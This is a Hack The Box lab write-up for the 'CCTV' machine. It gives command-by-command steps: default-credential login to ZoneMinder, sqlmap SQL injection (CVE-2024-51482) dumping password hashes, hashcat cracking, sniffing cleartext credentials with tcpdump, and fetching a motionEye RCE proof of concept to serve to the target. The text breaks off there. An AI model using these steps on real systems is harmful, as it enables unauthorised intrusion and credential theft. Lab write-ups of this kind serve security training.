π¦CCTV
πΉ HTB CCTV β Solution Notes
Platform: Hack The Box Machine: CCTV OS: Linux (Ubuntu 24.04) Difficulty: Medium Date: March 27, 2026 CVEs: CVE-2024-51482, CVE-2025-60787
πΊοΈ Attack Chain
Nmap β Web recon (ZoneMinder) β admin:admin login β SQLi (CVE-2024-51482)
β Hash dump β Hashcat β SSH (mark) β Internal traffic sniffing with tcpdump
β sa_mark credentials β motionEye RCE (CVE-2025-60787) β ROOT
π§ How Does a Hacker Think? β Before You Begin
When starting a machine, there should be one question in your mind: "What is this system's exposed surface?"
1οΈβ£ Reconnaissance
Port Scanning
bash
nmap -sV -sC -O 10.129.243.147
Findings:
π‘ What is Nmap? What Do the Parameters Mean?
/etc/hosts Setup
bash
echo "10.129.243.147 cctv.htb" | sudo tee -a /etc/hosts
π‘ Why Do We Add It to /etc/hosts?
π§ How Does a Hacker Think? β Approaching a Web Application
We see a web application. Now we need to ask these questions:
2οΈβ£ Web Application Discovery
The homepage presents a company site called "SecureVision CCTV & Security Solutions." The "Staff Login" button leads to the /zm endpoint.
bash
curl -s http://cctv.htb/ | grep -i "href\|login"
# Output: href="http://cctv.htb/zm" β Staff Login
ZoneMinder Detection
bash
curl -s http://cctv.htb/zm/ | grep -i "title\|version"
# Output: <title>ZM - Login</title>
π‘ What is ZoneMinder?
Login β Default Credentials
bash
curl -s -X POST http://cctv.htb/zm/index.php \
-d "username=admin&password=admin&action=login&view=login" \
-c cookies.txt -L | grep -i "monitor\|welcome"
admin:admin login succeeded!
π‘ Why Do Default Credentials Work?
Version Detection
bash
curl -s -b cookies.txt http://cctv.htb/zm/api/host/getVersion.json
# Output: {"version":"1.37.63","apiversion":"2.0"}
π§ How Does a Hacker Think? β CVE Hunting
We now know the version: ZoneMinder 1.37.63. What should we do next?
3οΈβ£ SQL Injection β CVE-2024-51482
π‘ What is SQL Injection?
π‘ What is sqlmap?
bash
sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=<SESSION_ID>" \
-p tid --dbms=mysql --batch \
-D zm -T Users -C "Username,Password" --dump
Results:
π§ How Does a Hacker Think? β Hash Cracking
We have the hashes. But these are bcrypt hashes β passwords are one-way encrypted, not plain text. We can't reverse them.
4οΈβ£ Hash Cracking β Hashcat
π‘ What is Hashcat? What Does -m 3200 Mean?
bash
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Result:
mark : opensesame
5οΈβ£ SSH Login
bash
ssh mark@cctv.htb
# Password: opensesame
bash
id
# uid=1000(mark) gid=1000(mark) groups=1000(mark),24(cdrom),30(dip),46(plugdev)
π§ How Does a Hacker Think? β Inside the System, What's Next?
We're in, but we're mark β not root. Now we need to ask:6οΈβ£ Internal Traffic Sniffing with tcpdump
π‘ What are Linux Capabilities?
bash
tcpdump -i any -A port 5000 2>/dev/null
Captured traffic:
USERNAME=sa_mark;PASSWORD=X1l9fx1ZjS7RZb;CMD=disk-info
A Python Flask service is sending cleartext credentials to motionEye at regular intervals in this format. Since it's unencrypted, it's completely readable in the traffic.
Lateral Movement β Switching to sa_mark
π‘ What is Lateral Movement?
bash
su sa_mark
# Password: X1l9fx1ZjS7RZb
bash # upgrade the shell
π© User Flag
bash
cat /home/sa_mark/user.txt
π§ How Does a Hacker Think? β Final Step: Root
We're sa_mark. No sudo. But looking at local ports, 8765 stands out.7οΈβ£ Privilege Escalation β CVE-2025-60787 (motionEye RCE)
π‘ What is motionEye? How Does the Vulnerability Work?
motionEye Version Check
bash
curl -s http://127.0.0.1:8765/ | grep "version"
# Output: v=0.43.1b4 β Vulnerable to CVE-2025-60787!
Download and Run the PoC
On Kali:
bash
wget https://raw.githubusercontent.com/gunzf0x/CVE-2025-60787/main/CVE-2025-60787.py -O /tmp/CVE-2025-60787.py
python3 -m http.server 8080 --directory /tmp
On the target machine: